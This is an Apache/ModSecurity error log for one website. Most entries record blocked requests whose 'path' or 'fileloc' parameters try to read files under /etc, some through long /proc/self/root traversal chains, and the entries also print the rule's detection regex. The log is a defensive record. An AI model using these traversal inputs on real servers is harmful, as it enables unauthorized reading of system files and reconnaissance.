[Fri Mar 20 10:14:12.411376 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:53174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IJNa6ubjKNq_cu4b07wAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:14:15.045129 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:53188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IJzJ3M9BSuKP7CAY9iAAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:14:16.382910 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:53192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IKDJ3M9BSuKP7CAY9iwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:14:18.130697 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:53194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1IKeoXxyEfFpUF8f-cEwAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:14:24.029105 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.49:50398] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IMPqxLDW4GITHUkQE1AAAAQo"]
[Fri Mar 20 10:14:27.697775 2026] [mime_magic:error] [pid 7893:tid 140411674785536] (70014)End of file found: [client 57.141.18.42:50616] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:14:51.013841 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 57.141.18.23:51726] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:14:51.444316 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.124:51862] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1ISzJ3M9BSuKP7CAY9tAAAAJI"]
[Fri Mar 20 10:14:52.040114 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.19:51900] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1ITAF0L0L-SsrnPo6EgAAAAsg"]
[Fri Mar 20 10:15:02.054338 2026] [mime_magic:error] [pid 31215:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:52462] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:15:03.315316 2026] [mime_magic:error] [pid 15826:tid 140411733534464] (70014)End of file found: [client 57.141.18.95:52506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:15:06.604628 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.42:52562] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1IWOoXxyEfFpUF8f-cSQAAAVY"]
[Fri Mar 20 10:15:09.209040 2026] [mime_magic:error] [pid 9818:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:52646] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:15:09.799777 2026] [:error] [pid 10189:tid 140411599251200] [client 57.141.18.99:52744] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1IXTJ3M9BSuKP7CAY9yAAAAJE"]
[Fri Mar 20 10:15:10.199293 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.5:52846] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1IXuoXxyEfFpUF8f-cTwAAAUw"]
[Fri Mar 20 10:15:12.195942 2026] [:error] [pid 31215:tid 140411741927168] [client 57.141.18.16:53000] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IYAF0L0L-SsrnPo6ElAAAAsA"]
[Fri Mar 20 10:15:15.442740 2026] [:error] [pid 21219:tid 140411599251200] [client 57.141.18.105:53264] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1IY_XLqtnMIWvjpaK10gAAApE"]
[Fri Mar 20 10:15:20.214631 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.10:53484] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IaPqxLDW4GITHUkQFMAAAARY"]
[Fri Mar 20 10:15:20.759520 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.36:53606] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IaNa6ubjKNq_cu4b1XAAAA0M"]
[Fri Mar 20 10:15:21.623477 2026] [:error] [pid 11642:tid 140411590858496] [client 57.141.18.17:53660] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Iabninkcc-iUj5Ap5JgAAA5I"]
[Fri Mar 20 10:15:24.822893 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.244.43:58494] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1IbF1pVZ5mVmJwsFNLvAAAAFU"]
[Fri Mar 20 10:15:25.963329 2026] [:error] [pid 21219:tid 140411658000128] [client 57.141.18.50:53986] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1IbfXLqtnMIWvjpaK16AAAAoo"]
[Fri Mar 20 10:15:29.682720 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.115:54158] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IcfHIg5MgXLBnicMSGwAAAc0"]
[Fri Mar 20 10:15:44.845807 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.7:54678] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1IgNa6ubjKNq_cu4b1gwAAA0A"]
[Fri Mar 20 10:16:08.546462 2026] [mime_magic:error] [pid 21219:tid 140411666392832] (70014)End of file found: [client 57.141.18.9:56398] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:16:14.639122 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.16:56658] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1InjJ3M9BSuKP7CAY-GgAAAJY"]
[Fri Mar 20 10:16:25.351251 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.53:57226] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1IqTJ3M9BSuKP7CAY-KwAAAJY"]
[Fri Mar 20 10:16:47.472353 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.96:58458] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Iv-oXxyEfFpUF8f-cuwAAAVg"]
[Fri Mar 20 10:17:04.495348 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:38684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1I0Lninkcc-iUj5Ap5tgAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:17:18.421602 2026] [:error] [pid 11642:tid 140411590858496] [client 57.141.18.107:60272] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1I3rninkcc-iUj5Ap5wwAAA5I"]
[Fri Mar 20 10:17:22.747941 2026] [:error] [pid 31215:tid 140411582465792] [client 57.141.18.46:60566] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1I4gF0L0L-SsrnPo6FEQAAAtM"]
[Fri Mar 20 10:17:25.063474 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.80:60730] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1I5RCii7xarUs8iHaFbgAAAg4"]
